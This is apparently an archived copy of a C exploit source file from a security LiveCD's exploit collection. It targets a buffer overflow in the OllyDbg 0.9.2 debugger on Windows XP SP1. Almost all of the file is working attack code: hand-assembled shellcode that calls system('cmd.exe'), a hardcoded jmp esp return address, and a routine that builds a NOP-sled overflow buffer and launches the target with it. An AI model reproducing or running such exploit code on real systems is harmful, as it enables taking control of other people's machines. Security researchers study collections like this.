Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / win32-ollyexploit.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 3.9 KB | 94 lines

/* Ollydbg 0.9.2 exploit, This can be grabbed from http://sh0dan.org/files/ollyexploit.c Very lame, just getting the hang of this win32 stuff Ollydbg is vulnerable to a buffer overflow when a valid program is passed with a large argv[], this made debugging other local overflows, well trouble some so i thought i'd write a little exploit for it, this is what happens when you have too much free time... Shellcode is my own, not optimized i need to figure out how to push the full msvcrt and cmd.exe string to the stack (i created this shellcode using visual c++ __asm( so eh. yeh. This exploit will only work on WinXP SP1 due to hardcoding the jmpesp in kernel32.dll and the shellcode addresses are hardcoded for xp sp1. take a peek at http://sh0dan.org/files/llacmd.txt for win2ksp3 shellcode. Ollydbg can be downloaded from: http://home.t-online.de/home/Ollydbg/ if you're curious. -wire shouts to my kittens. */ #include <windows.h> #include <stdio.h> #include <string.h> char shellcizode[] = "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x53" // push ebx "\x56" // push esi "\x57" // push edi "\x8b\xe5" // mov esp, ebp "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x33\xff" // xor edi,edi "\x57" // push edi "\x57" // push edi "\xc6\x45\xf8\x6d" // mov byte ptr ss:[ebp-8],6d "\xc6\x45\xf9\x73" // mov byte ptr ss:[ebp-7],73 "\xc6\x45\xfa\x76" // mov byte ptr ss:[ebp-6],76 "\xc6\x45\xfb\x63" // mov byte ptr ss:[ebp-5],63 "\xc6\x45\xfc\x72" // mov byte ptr ss:[ebp-4],72 "\xc6\x45\xfd\x74" // mov byte ptr ss:[ebp-3],74 "\xb8\x61\xd9\xe7\x77" // mov eax,kernel32.loadlibraryA; remember the address is put on inverted... "\x50" // push eax "\x8d\x45\xf8" // lea eax, dword ptr ss:[ebp-8] "\x50" // push eax "\xff\x55\xf4" // call dword ptr ss:[ebp-c] "\x58" // pop eax "\x58" // pop eax "\x58" // pop eax "\x33\xc0" // xor eax,eax "\x50" // push eax "\x50" // push eax "\xc6\x45\xf8\x63" // mov byte ptr ss:[ebp-8],63 "\xc6\x45\xf9\x6d" // mov byte ptr ss:[ebp-7],6d "\xc6\x45\xfa\x64" // mov byte ptr ss:[ebp-6],64 "\xc6\x45\xfb\x2e" // mov byte ptr ss:[ebp-5],2e "\xc6\x45\xfc\x65" // mov byte ptr ss:[ebp-4],65 "\xc6\x45\xfd\x78" // mov byte ptr ss:[ebp-3],78 "\xc6\x45\xfe\x65" // mov byte ptr ss:[ebp-2],65 "\xb8\x44\x80\xc2\x77" // mov eax, 77c28044; addy of system() from msvcrt in xp sp1 "\x50" // push eax "\x8d\x45\xf8" // lea eax, dword ptr ss:[ebp-8] "\x50" // push eax "\xff\x55\xf4" // call dword ptr ss:[ebp-c] "\x83\xc4\x04" // add esp, 04h "\x5c" // pop esp "\xc3"; // ret we're done! int main(int argc, char **argv) { char exp_buff[1024]; int x; char ollyfile[100]; char hehbuf[200]; DWORD jmpesp = 0x77E9AE59; // from kernel32.dll XP sp1 if (argc != 2) { fprintf(stderr, "heh: %s <path to olly>\n", argv[0]); exit(1); } strncpy(ollyfile, argv[1], 99); ollyfile[100] = 0x00; x = strlen(ollyfile) * 2; // each character changes where the return is by 2 characters due to it being passed once to // call the program and the other for calling itself C:\olly\ollydbg.exe C:\olly\ollydbg.exe .. memset(exp_buff, 0x90, 1024); //set our buff to nops... sprintf(hehbuf, "%s %s ", ollyfile, ollyfile); // C:\ollydbg.exe C:\ollydbg... memcpy(exp_buff, hehbuf, strlen(hehbuf)); memcpy(exp_buff+511+x, &jmpesp, 4); // C:\ollydbg.exe C:\ollydbg.exe NOPx511+x memcpy(exp_buff+518+x, &shellcizode, 105); // And our shellcode. exp_buff[700] = 0x00; // null it so we're passing a valid string. //fprintf(stderr, "%s", exp_buff); //debugging heh WinExec(exp_buff, SW_SHOW); //execute.... return(0); }